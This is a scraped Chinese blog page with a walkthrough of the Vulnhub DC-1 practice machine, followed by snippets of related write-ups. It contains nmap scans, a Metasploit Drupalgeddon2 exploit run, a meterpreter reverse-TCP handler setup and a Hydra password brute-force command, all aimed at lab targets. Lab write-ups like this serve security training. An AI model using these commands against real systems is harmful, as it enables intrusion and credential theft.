Vulnhub靶机实战——DC-1

最新推荐文章于 2023-03-17 10:25:09 发布

冠霖L

最新推荐文章于 2023-03-17 10:25:09 发布

阅读量2k

点赞数 4

分类专栏：靶机文章标签： DC-1 靶机渗透测试

本文链接：https://blog.csdn.net/weixin_43583637/article/details/101542749

版权

靶机DC-1下载地址：https://download.vulnhub.com/dc/DC-1.zip

描述：靶机DC-1共有5个flag，并且需要root权限才可以找到并查看flag

环境：Vmware 15 Pro虚拟机软件

DC-1靶机IP地址：192.168.220.130

Kali的IP地址：192.168.220.131

本次DC-1靶机渗透测试，靶机与kali都以NAT模式连接网络，查看kali的IP地址：

ip addr

使用nmap扫描工具，扫描192.168.220.0/24网段，发现存活主机，断定192.168.220.130是DC-1靶机的IP地址

nmap -sP 192.168.220.0/24 -oN nmap220.sP

nmap扫描靶机开放的端口号，扫描范围0-65535，发现开放22（ssh）、80（http）、111和57744共四个端口

nmap -A 192.168.220.130 -p- -oN nmap130.A

浏览器输入DC-1靶机IP地址访问网站：http://192.168.220.130

发现网站是用Drupal（CMS+PHP）搭建的，使用的是Drupal 7版本

使用msfconsole查找可以针对Drupal的模块

msf > search drupal    #查找可用于Drupal的模块

尝试使用查询出来的模块，从一个开始尝试使用，发现只有三、五两个模块可以针对Drupal 使用，并能够成功反弹shell，其他模块皆失败

msf > use exploit/unix/webapp/drupal_drupalgeddon2
msf exploit(unix/webapp/drupal_drupalgeddon2) > set RHOST 192.168.220.130
msf exploit(unix/webapp/drupal_drupalgeddon2) > show options
msf exploit(unix/webapp/drupal_drupalgeddon2) > run

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

冠霖L

关注关注

4
点赞
踩
18

收藏

觉得还不错? 一键收藏
2
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用（二）

杨秀璋的专栏

04-11

1万+

这是作者的网络安全自学教程系列，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您们喜欢，一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目，采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用，通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章，希望对您有所帮助。

Vulnhub靶机实战——DC-6

冠霖L的博客

10-28

4001

靶机DC-6下载地址：https://download.vulnhub.com/dc/DC-6.zip 环境：VMware 15虚拟机软件 DC-6靶机IP地址：192.168.220.139 Kali的IP地址：192.168.220.142 DC-6靶机与kali都以NAT模式连接到网络，查看kali的IP地址：192.168.220.142...

2 条评论您还未登录，请先登录后发表或查看评论

vulnhub的DC-1

BurYiA的博客

05-02

692

文章目录vulnhub的DC-1准备工作1.主机查找2.信息搜集3.正文方法一方法二 vulnhub的DC-1 大神们可以退场了，小白的第一篇文章，可能会有很多错误，很多地方可能也会说不清楚。望见谅。前段时间了解到这个平台，然后就开始难受了，真心不会做（就是太菜了）。闲话就不多说了，开始吧准备工作 1.DC-1虚拟机（可能得搭梯子，自行尝试） 2.kali虚拟机 1.主机查找这个就是基本操作...

DC-1靶机

weixin_52525624的博客

02-24

338

nmap -sP 192.168.1.0/24 然后找到咱们的靶机 nmap -sV -Pn -n 192.168.1.57 访问该站点并查看robots.txt敏感文件依次访问robots.txt文件中的敏感文件目录信息，发现UPGRADE.txt文件爆露出版本号寻找drupal 7.X版本漏洞，并进行利用 2：使用MSF搜索相关模块并进行利用 Search drupal Use exploit/unix/webapp/drupal_drup...

vulnhub靶机：DC-1

Keepb1ue的博客

09-28

2143

文章目录靶机配置说明:靶机环境配置:靶机渗透开始:确定目标ip:端口扫描:常规扫描下目录:msf漏洞利用:切换到交互式shell:获取敏感信息:重置管理员密码:添加管理员用户:suid提权: 靶机配置说明: 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机：DC1 (VirtualBox) IP:192.168.56.110 攻击机：Kali(VMware) IP:192.168.56.108 在下载地址中有详细的靶机说明，而DC-1需要寻找的flag总数为

Vulnhub靶机 DC-1

菜浪马废的博客

03-19

331

查找靶机IP 扫描本地，254是Kali，那138就是DC-1 arp-scan -l 对DC-1进行端口扫描发现开放80端口，进浏览器查看一下 nmap -sV 192.168.0.138 发现CMD是Drupal 漏洞查找 msfconsole 启动msf search drupal 查找drupal漏洞看到最新的是2019-02-20，但是等级是normal，还是用2018-...

vulnhub靶机渗透DC-1

RestoreJustice的博客

03-17

541

下载后用 VMware 或者 VirtualBox 打开，并配置好网卡，靶机与攻击机应置于同一网络下，靶机默认是桥接模式，能用攻击机连接到就行。这里提权我们可以考虑爆破22端口或者内核提权（绝招，实在没办法在考虑），但在此之前我们可以尝试找找是否有一些拥有suid标识的命令，利用其提权。使用nmap扫描主机服务、端口情况（-p-等价于-p 1-65535）：nmap -p- -A 192.168.3.27。而且是几年前的，可以考虑使用MSF，上面应该集成了相关漏洞利用脚本，如果没有就得手工利用了。

Vulnhub靶机实战——DC-3

冠霖L的博客

09-27

9240

靶机DC-3下载地址：https://download.vulnhub.com/dc/DC-3.zip 靶机DC-3VMware下载地址：https://download.vulnhub.com/dc/DC-3VMware.zip 注：开始将DC-3.ova文件导入VMware虚拟机，发现无法获取到靶机IP地址，作者在DC-3靶机下载页面提到可以下载已经搭建好的DC-3VMware，然...

Vulnhub靶机实战——DC-4

冠霖L的博客

09-27

3288

靶机DC-4下载地址：https://download.vulnhub.com/dc/DC-4.zip 描述：从靶机DC-3开始，只有一个入口和一个最终的flag，只有拿到root权限才可以发现最终的flag，DC-4也是一样环境：Vmware 15 Pro虚拟机软件 DC-4靶机IP地址：192.168.220.138 Kali的IP地址：...

Vulnhub靶机实战——DC-2

冠霖L的博客

09-27

4975

靶机DC-2下载地址：https://download.vulnhub.com/dc/DC-2.zip 描述：靶机DC-2与DC-1一样，共有5个flag，但最终需要root权限才可以找到并查看flag 环境：Vmware 15 Pro虚拟机软件 DC-1靶机IP地址：192.168.220.132 Kali的IP地址：192.168.22...

Vulnhub靶机实战-Warzone 1

黑白的博客

01-10

807

声明好好学习，天天向上搭建使用virtualbox打开，网络配置和我的PRESIDENTIAL文章一样，是要vmware和virtualbox互连渗透存活扫描，发现目标 arp-scan -l nmap -sP 192.168.239.1/24 端口扫描 nmap -T4 -A 192.168.239.5 -p 1-65535 -oN nmap.A 开启端口 21,22,5000 以匿名用户登录ftp，发现了两个文件。 note里面提示请使用jar包加密密码反编译一下jar包，用juid

Vulnhub靶机实战——DC-8

冠霖L的博客

10-30

3587

靶机DC-8下载地址：https://download.vulnhub.com/dc/DC-8.zip 环境：VMware 15虚拟机软件 DC-8靶机IP地址：192.168.220.156 Kali的IP地址：192.168.220.155 DC-8靶机与kali都以NAT模式连接到网络，查看kali的IP地址：192.168.220.155 ...

Vulnhub靶机实战-Lampiao

黑白的博客

01-10

653

声明好好学习，天天向上搭建使用virtualbox打开，网络和我的PRESIDENTIAL一样，是要vmware和virtualbox互连渗透存活扫描，发现目标 arp-scan -l nmap -sP 192.168.239.1/24 端口扫描 nmap -T4 -A 192.168.239.12 -p 1-65535 -oN nmap.A 开启端口发现开启80，22，1898 访问80 http://192.168.239.12 80开了个寂寞 dirscan连接还有问题看看18

Vulnhub靶机实战-HOGWARTS DOBBY

黑白的博客

01-10

571

声明好好学习，天天向上搭建使用virtualbox打开，网络和我的PRESIDENTIAL一样，是要vmware和virtualbox互连渗透存活扫描，发现目标 arp-scan -l nmap -sP 192.168.239.1/24 端口扫描 nmap -T4 -A 192.168.239.8 -p 1-65535 -oN nmap.A 开启端口发现开启80 访问80 http://192.168.239.6 F12查看源码，发现目录访问 http://192.168.239.8

Vulnhub靶机实战-CH4INRULZ

黑白的博客

01-18

545

声明好好学习，天天向上搭建使用vmware打开渗透存活扫描，发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.31.180 -p 1-65535 -oN nmap.A 开启端口发现开启21，22，80，8011 访问80 http://192.168.31.180 扫描web目录 python3 dirsearch.py -u 192.168.31.180 development中得登录 index中告诉我们还没开发完剩下的没什么消息了访问备份文

Vulnhub靶机实战-Billu_b0x

黑白的博客

01-10

565

声明好好学习，天天向上搭建使用virtualbox打开，网络和我的PRESIDENTIAL一样，是要vmware和virtualbox互连渗透存活扫描，发现目标 arp-scan -l nmap -sP 192.168.239.1/24 端口扫描 nmap -T4 -A 192.168.239.14 -p 1-65535 -oN nmap.A 开启端口发现开启80，22 访问80 http://192.168.239.14 熟悉的四个字母SQLi 试了一堆，试了个寂寞 vulnhub惯例

Vulnhub靶机实战-PRESIDENTIAL

黑白的博客

01-10

1359

声明好好学习，天天向上搭建 vulnhub官网下载完镜像后，用vmware打开，遇到错误点击重试，即可，选择NAT后，直接就DHCP了注意一点，vmware的兼容性，有问题，我用vmware，反弹shell和提权的时候，惨遭失败，一定要用oracle virtualbox，一定一定一定 vmware我用的桥接，virtualbox用的仅主机网卡#2，调了一下本机的网卡，调了半天，两边才能互相ping通信我一句话，这非技术问题困了我好几天，弄不出来，vulnhub首页说建议用virtualbox，又说

Vulnhub 靶机实战系列：DC -1

WangRuaRua

05-29

551

靶机搭建靶机下载地址： https://www.five86.com/dc-1.html 靶机DC-1与kali都以NAT模式连接网络信息收集 1.使用arp-scan探索 arp-scan -l //命令探测同一区域中存活主机 kali ip：192.168.175.134 DC-1 ip：192.168.175.128 2.使用Namp扫描 Namp -A 192.168.175.128 //全面扫描开放了22 ssh、80 http apache、111 rpcbind 3.访问

DAY29（DAY30拓展）：Vulnhub--靶机实战

qq_49433473的博客

08-12

2496

Vulnhub DC-1、DC-2靶机通关手册

vulnhub靶机dc-1

最新发布

01-11

### VulnHub DC-1 靶机攻略介绍下载 #### 关于DC-1靶机 VulnHub上的DC-1靶机旨在提供给安全爱好者和渗透测试学习者一个实践平台，在此环境中可以合法地进行各种攻击尝试，从而提升技能。该虚拟环境模拟了一个存在多个已知漏洞的服务网络应用，允许参与者通过一系列挑战来获取系统的控制权并最终找到隐藏的标志文件(flag)[^1]。 #### 获取与安装为了开始体验DC-1靶机的任务，首先需要访问[VulnHub官方网站](https://www.vulnhub.com/)搜索栏输入“DC-1”，点击进入详情页面下载对应的镜像文件(OVA格式)，之后按照提示导入到支持OVA标准的虚拟化工具如VirtualBox或VMware Workstation Pro中完成部署工作[^3]。 #### 初始配置建议启动后的DC-1默认会分配一个私有IP地址(例如：`192.168.x.x`)，此时应该确保Kali Linux作为攻击端能够与其在同一局域网内通信正常；可以通过ping命令验证连通性状况良好后再继续后续操作。 #### 基础信息搜集阶段当确认双方设备间通讯无碍后便进入了实际演练环节——即从基础的信息收集做起。这一步骤通常涉及使用Nmap扫描开放端口和服务版本探测等手段以了解目标主机概况： ```bash nmap -A <target-ip> ``` 上述指令将会返回有关远程服务器运行状态的关键情报，为下一步制定针对性策略奠定坚实的基础。 #### 进阶探索与利用路径随着对DC-1认识程度加深，接下来便是寻找潜在的安全缺陷加以利用的过程。根据已有经验分享可知，成功建立Meterpreter回话意味着已经突破了初步防线，获得了更深层次的操作权限: ```ruby use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost <local-ip> # Kali IP address exploit ``` 以上Metasploit框架下的设置可帮助快速搭建监听服务等待来自受害者的连接请求，一旦形成稳定的交互通道即可执行更多高级功能比如浏览目录结构直至定位至预设的目标文件位置。 #### 密码破解辅助技巧考虑到可能存在弱密码保护的情况，采用Hydra这样的暴力猜解程序配合常用用户名列表以及大型词库资源不失为一种高效的方法去揭示真实的身份凭证组合关系[^4]： ```bash hydra -L /usr/share/wordlists/user.txt -P /usr/share/wordlists/rockyou.txt.gz ftp://<target-ip> ``` 这里展示了针对FTP协议实施登录认证绕过的实例，当然具体应用场景还需视实际情况灵活调整参数选项。